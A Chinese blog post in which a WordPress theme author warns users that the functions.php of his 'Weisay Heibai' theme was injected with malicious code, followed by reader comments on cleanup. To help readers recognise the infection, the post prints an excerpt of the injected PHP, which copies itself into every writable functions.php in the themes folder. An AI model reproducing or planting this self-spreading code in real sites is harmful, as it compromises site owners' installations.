【特别注意】主题『Weisay Heibai』无缓存头像版重大更新-威言威语

【特别注意】主题『Weisay Heibai』无缓存头像版重大更新

William2011-09-20 18:57设计24,926次阅读125条评论

扫一扫手机看

今天朋友说我的主题（『Weisay Heibai』无缓存头像版）中的functions.php被插入了恶意代码，我感到非常的震惊，赶紧下载打开查证，果然发现了恶意代码，现在我已经删掉了此段恶意代码，主题包也已经更新过了，请下载使用过的朋友赶紧删除主题文件夹下面的functions.php，重新下载我新上传主题包中的functions.php。

这段代码会感染主题文件夹下的其他主题，可能会把这段代码复制到其他主题的functions.php下面，所以很抱歉，大家要修正不仅仅是『Weisay Heibai』无缓存头像版，还有你主题文件夹下的其他主题，请使用的朋友特别注意检查下，看有没有问题，我深感抱歉。

WordPress黑白主题『Weisay Heibai』我发布2个版本，『Weisay Heibai』无缓存头像版是我后来发布的版本，开始使用的人可能不知道，『Weisay Heibai』缓存头像版是没有问题的，只有『Weisay Heibai』无缓存头像版有问题。

前几天帮人家修改了主题，可能导致这个问题的发生，开始我也不知道竟然还有这个东东，感谢zwwooooo的提醒。

希望用过我主题的朋友，都检查下主题的functions.php，看看其中有没有类似这段，这段恶意代码很长，我截取前面一段。

function _verifyactivate_widgets(){
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
		foreach ($direst as $item){
			if (is_writable($item)){
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
					$comaar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . "Not found" . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $comaar . "\n" .$widget);fclose($f);
					$output .= ($isshowdots && $ellipsis) ? "..." : "";
				}
			}
		}
	}

我主题正常的functions.php在

add_filter('the_content', 'password_hint');
//全部设置结束
?>

之后就结束了，后面还有其他代码的话就说明有问题了。

希望使用我主题的朋友都检查下，再次深感抱歉，以后我会严格检查我的主题的。

本文固定链接: https://www.weisay.com/blog/weisay-heibai-no-gravatar-cache-update.html | 威言威语

63楼

蛋疼哥：

表示我中了，删不掉，一直感染其他主题，后来还是删除了

2013-05-07 00:27 回复

62楼

javis：

只传functions.php行吗

2012-08-02 15:22 回复

William博主：

@javis可能其他主题会被感染，只修改一个不一定确保所以的都正常，你可以先试试。

2012-08-02 16:00 回复
- javis：
  
  @William其他主题已经悲剧了，都改了，只改这个文件有用吗，会不会还有哪儿有
  
  2012-08-02 16:02 回复
  - William博主：
    
    @javis貌似只会感染functions.php。你删除每个主题的functions.php里面的感染代码应该也可以。
    
    2012-08-02 16:06 回复
    - javis：
      
      @William谢啦。我也不知道这个代码是哪来的。
      
      2012-08-02 16:08 回复

61楼

lz问下，我把后面那段直接删了，行不？还有我是今天刚下载的黑白，还是有这段代码。

2012-08-02 14:53 回复

William博主：

@javis刚刚又下载看了下，是正常的，建议你删掉主题文件夹里面的全部主题，然后重新上传主题。

2012-08-02 15:18 回复
- javis：
  
  @William好狠，要全删。。我改了很多了
  
  2012-08-02 15:21 回复

60楼

黑涩的猪：

我想问下，我用了Comment Info Detector插件，就是和你的show-useragent是同种插件，但我的却无法显示用户信息，是我换了主机后才这样的，楼主能不能帮忙呢，我对权限设置方面不懂

2012-02-06 17:07 回复

William博主：

@黑涩的猪没有用过这个Comment Info Detector，要不你用show-useragent，挺好的

2012-02-06 21:57 回复
- 黑涩的猪：
  
  @William正准换呢，今天主机抽了，没法换…
  
  2012-02-08 11:48 回复